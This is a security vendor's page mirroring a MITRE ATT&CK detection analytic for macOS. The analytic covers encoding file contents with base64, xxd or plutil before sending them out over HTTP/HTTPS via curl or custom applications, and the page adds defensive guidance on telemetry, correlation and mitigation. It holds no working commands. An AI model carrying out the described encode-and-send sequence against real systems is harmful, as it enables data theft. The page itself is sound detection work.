Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN0304: Analytic 0304

Processes use built-in encoding utilities (e.g., `base64`, `xxd`, or `plutil`) to encode file contents followed by HTTP/HTTPS transfer via curl or custom applications.

EnterpriseAN0304AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

This analytic matters because it describes a macOS data-handling pattern that can turn ordinary built-in tools into a potential exfiltration signal: file contents are encoded with utilities such as base64, xxd, or plutil and then transferred over HTTP or HTTPS using curl or a custom application. For leaders, the practical question is whether the organization can distinguish legitimate automation and administration from unusual file encoding followed by outbound web transfer.

Executive priority

Prioritize this as a validation item for macOS visibility, data-loss investigation readiness, and SOC triage quality. The behavior uses common tools and standard web protocols, so control value depends less on blocking a single binary and more on having reliable endpoint process telemetry, outbound network evidence, and a clear baseline for approved scripts, developers, administrators, and applications that legitimately encode and transmit data.

Technical view

For SOC and detection teams, validate whether macOS endpoint telemetry can correlate process execution of built-in encoding utilities such as base64, xxd, or plutil with subsequent HTTP/HTTPS transfer activity by curl or non-standard/custom applications. Because no official detection logic is supplied and no ATT&CK tactic is specified, treat this as a behavior-correlation analytic rather than a standalone alert. Useful triage context includes parent process, command-line arguments where available, encoded file paths, destination domain or IP, user identity, working directory, signing/notarization status of the transferring application where collected, and whether the activity matches approved automation.

Likely telemetry

  • macOS process creation events for base64, xxd, plutil, curl, and custom applications
  • Command-line arguments and parent-child process relationships where available
  • File access or file read events for encoded content where available
  • HTTP/HTTPS outbound connection metadata, including destination host, IP, port, URL or SNI where collected
  • User, host, working directory, and process metadata for correlation

Detection direction

  • Build or validate correlation between local encoding utilities and near-time outbound HTTP/HTTPS transfer from the same user, host, process tree, or script context.
  • Tune against expected macOS administrative, developer, CI/CD, backup, logging, and support workflows that may legitimately encode files and send them over web protocols.
  • Pay attention to custom or uncommon applications performing the transfer after encoding activity, since the official description explicitly includes curl or custom applications.
  • Do not rely only on network controls: HTTPS may limit content inspection, and curl/custom apps may blend into normal outbound web traffic.
  • Do not rely only on individual process names: base64, xxd, plutil, and curl are legitimate built-in or common utilities, so context and sequence are essential.

Mitigation priorities

  • Confirm macOS endpoint logging coverage for process execution, command-line capture, file activity, and outbound network metadata.
  • Define approved business use cases for file encoding and web transfer, especially for administrators, developers, automation accounts, and support tooling.
  • Apply least-privilege and data access controls so users and processes cannot freely read sensitive files not required for their role.
  • Use egress governance appropriate to the environment, including review of destinations and applications permitted to send outbound HTTP/HTTPS traffic.
  • Document expected telemetry and investigation steps as compliance and incident-response evidence for data movement and exfiltration investigations.
Analyst notes and limits

The supplied object is a detection analytic for macOS only. It describes a pattern of encoding file contents with built-in utilities followed by HTTP/HTTPS transfer. No tactic, relationship context, or official detection procedure is provided, so this take emphasizes validation, telemetry readiness, and correlation design rather than a specific rule.

Source fields are sparse: there are no relationships, no official detection text, no named ATT&CK technique in the supplied context, and no evidence of active exploitation or attribution. Local baselines are required to separate legitimate encoding and transfer workflows from suspicious activity.

Official MITRE ATT&CK definition

Analytic 0304

Processes use built-in encoding utilities (e.g., `base64`, `xxd`, or `plutil`) to encode file contents followed by HTTP/HTTPS transfer via curl or custom applications.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
1609d1f3d0f793ac...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 1609d1f3d0f7…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack AN0304
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use